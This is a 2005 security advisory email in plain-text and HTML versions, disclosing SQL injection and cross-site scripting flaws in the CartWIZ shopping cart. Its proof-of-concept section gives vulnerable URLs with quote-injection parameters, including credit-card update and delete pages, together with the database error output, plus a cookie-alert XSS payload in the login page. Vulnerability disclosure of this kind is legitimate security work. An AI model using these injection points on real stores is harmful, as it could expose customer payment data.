------=_NextPart_001_0019_01C58325.852302E0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Dcrab 's Security Advisory http://www.dbtech.org Deadbolt Computer Technologies ****************************** SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU = CAN SEND EMAILS TO DCRAB@HACKERSCENTER.COM ****************************** Get Dcrab's Services to audit your Web servers, scripts, networks, etc = or even code them. Learn more at http://www.dbtech.org Severity: High Title: [Bday Release] Cartwiz shopping cart has multiple Sql injection = and Cross Site Scripting vulnerabilities Date: 8/07/2005 Vendor: CartWIZ Vendor Website: http://www.cartwiz.com/ Vendor Status: Contacted but no reply Summary: There are, multiple sql injection and cross site scripting = vulnerabilities in CartWIZ Shopping Cart Proof of Concept Exploits:=20 www.site.com/cartwiz/store/tellAFriend.asp?idProduct=3D' SQL INJECTION Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark = before the character string ''. /cartwiz/store/tellAFriend.asp, line 71 www.site.com/cartwiz/store/viewSupportTickets.asp?sortType=3D'&sortOrder=3D= ticketNum&page=3D0 SQL INJECTION Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark = before the character string ''. www.site.com/cartwiz/store/viewSupportTickets.asp, line 149 www.site.com/cartwiz/store/updateCreditCards.asp?id=3D' SQL INJECTION Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark = before the character string ' and idCustomer=3D1'. /cartwiz/store/updateCreditCards.asp, line 31 www.site.com/cartwiz/store/deleteCreditCards.asp?id=3D' SQL INJECTION Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark = before the character string ''. www.site.com/cartwiz/store/deleteCreditCards.asp, line 27 www.site.com/cartWiz/store/login.asp?message=3D>&redirect=3D%2FcartWiz%2Fstore%2FmyAccount%2Easp Cross Site Scripting Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah = and at http://www.hackerscenter.com Author:=20 These vulnerabilities have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://www.dbtech.org/. Lookout for my = soon to come out book on Secure coding with php. -------------------------------------------------------------------------= ------- Sincerely,=20 Diabolic Crab=20 ------=_NextPart_001_0019_01C58325.852302E0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Dcrab 's Security Advisory
http://www.dbtech.org
Deadbolt = Computer=20 Technologies
 
******************************
SPECIAL BIRTHDAY=20 RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND EMAILS TO = DCRAB@HACKERSCENTER.COM
**= ****************************
 
Get Dcrab's Services to audit your Web = servers,=20 scripts, networks, etc or even code them. Learn more at http://www.dbtech.org
 
Severity: High
Title: [Bday Release] = Cartwiz=20 shopping cart has multiple Sql injection and Cross Site Scripting=20 vulnerabilities
Date: 8/07/2005
 
Vendor: CartWIZ
Vendor Website: http://www.cartwiz.com/
Vendor = Status:=20 Contacted but no reply
Summary: There are, multiple sql injection and = cross=20 site scripting vulnerabilities in CartWIZ Shopping Cart
 

Proof of Concept Exploits:
 
= www.site.com/cartwiz/store/tellAFriend.asp?idProduct=3D'
SQL=20 INJECTION
 
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
 
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation = mark=20 before the character string ''.
 
/cartwiz/store/tellAFriend.asp, line 71
 

www.site.com/cartwiz/store/v= iewSupportTickets.asp?sortType=3D'&sortOrder=3DticketNum&page=3D0=
SQL=20 INJECTION
Microsoft OLE DB Provider for ODBC Drivers error = '80040e14'
 
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation = mark=20 before the character string ''.
 
www.sit= e.com/cartwiz/store/viewSupportTickets.asp,=20 line 149
 

w= ww.site.com/cartwiz/store/updateCreditCards.asp?id=3D'
SQL=20 INJECTION
Microsoft OLE DB Provider for ODBC Drivers error = '80040e14'
 
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation = mark=20 before the character string ' and idCustomer=3D1'.
 
/cartwiz/store/updateCreditCards.asp, line 31
 

w= ww.site.com/cartwiz/store/deleteCreditCards.asp?id=3D'
SQL=20 INJECTION
Microsoft OLE DB Provider for ODBC Drivers error = '80040e14'
 
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation = mark=20 before the character string ''.
 
www.site= .com/cartwiz/store/deleteCreditCards.asp,=20 line 27
 

&redirect=3D%2FcartWiz%2Fstore%2FmyAcco= unt%2Easp">www.site.com/cartWiz/store/login.asp?message=3D><script&= gt;alert(document.cookie);</script>&redirect=3D%2FcartWiz%2Fsto= re%2FmyAccount%2Easp
Cross=20 Site Scripting
 

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.a= h and=20 at http://www.hackerscenter.com
 
Author:
These vulnerabilities have been found and released by = Diabolic=20 Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel = free to=20 contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com = or http://www.dbtech.org/. Lookout for = my soon to=20 come out book on Secure coding with php.

Sincerely,
Diabolic Crab


------=_NextPart_001_0019_01C58325.852302E0--